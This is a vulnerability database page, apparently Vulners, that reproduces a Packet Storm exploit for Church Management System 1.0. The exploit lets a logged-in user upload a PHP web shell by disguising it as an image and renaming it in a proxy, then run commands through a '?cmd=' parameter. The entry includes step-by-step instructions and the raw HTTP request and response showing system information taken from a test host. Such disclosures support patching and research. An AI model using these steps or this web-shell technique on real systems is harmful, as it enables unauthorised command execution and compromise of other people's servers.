Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Church Management System 1.0 Shell Upload

🗓️ 05 Jul 2021 00:00:00Reported by Murat DemirciType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 222 Views

Church Management System 1.0 Shell Upload vulnerability allows authenticated users to upload PHP shell by altering file extension to .jpg or .png, leading to Remote Code Execution

Code
`# Exploit Title: Church Management System 1.0 - Unrestricted File Upload to Remote Code Execution (Authenticated)  
# Date: 07/03/2021  
# Exploit Author: Murat DEMIRCI (@butterflyhunt3r)  
# Vendor Homepage: https://www.sourcecodester.com  
# Software Link: https://www.sourcecodester.com/php/11206/church-management-system.html  
# Version: 1.0  
# Tested on: Windows 10  
# CVE : N/A  
  
# Proof of Concept :  
  
1- Login any user account and change profile picture.  
2- Upload any php shell by altering it's extension to .jpg or .png. (i.e test.php.jpg)  
3- Before uploading your file, intercept your traffic by using any proxy.  
4- Change test.php.jpg file to test.php and click forward.  
5- Find your test.php file path and try any command.  
  
  
###################### REQUEST ##########################################  
  
GET /cman/members/uploads/test.php?cmd=SYSTEMINFO HTTP/1.1  
Host: localhost  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0  
Accept: image/webp,*/*  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate  
Connection: close  
Referer: http://localhost/cman/members/dashboard.php  
Cookie: PHPSESSID=cne8l4ct93krjqobdus7nv2sjc  
  
####################### RESPONSE #########################################  
  
HTTP/1.1 200 OK  
Date: Sat, 03 Jul 2021 11:28:16 GMT  
Server: Apache/2.4.46 (Win64) OpenSSL/1.1.1j PHP/8.0.3  
X-Powered-By: PHP/8.0.3  
Content-Length: 4410  
Connection: close  
Content-Type: text/html; charset=UTF-8  
  
  
Host Name: MRT  
OS Name: Microsoft Windows 10 Pro  
OS Version: 10.0.19043 N/A Build 19043  
OS Manufacturer: Microsoft Corporation  
OS Configuration: Standalone Workstation  
OS Build Type: Multiprocessor Free  
Registered Owner: Murat   
System Boot Time: 6/25/2021, 2:51:40 PM  
System Manufacturer: Dell Inc.  
System Type: x64-based PC  
Processor(s): 1 Processor(s) Installed.  
  
  
############################################################################  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
05 Jul 2021 00:00Current
7.4High risk
Vulners AI Score7.4
remote code executionunrestricted file uploadchurch management systemauthenticated uploadwindows 10php shellproof of conceptvulnerabilityinformation disclosurefile upload vulnerability
222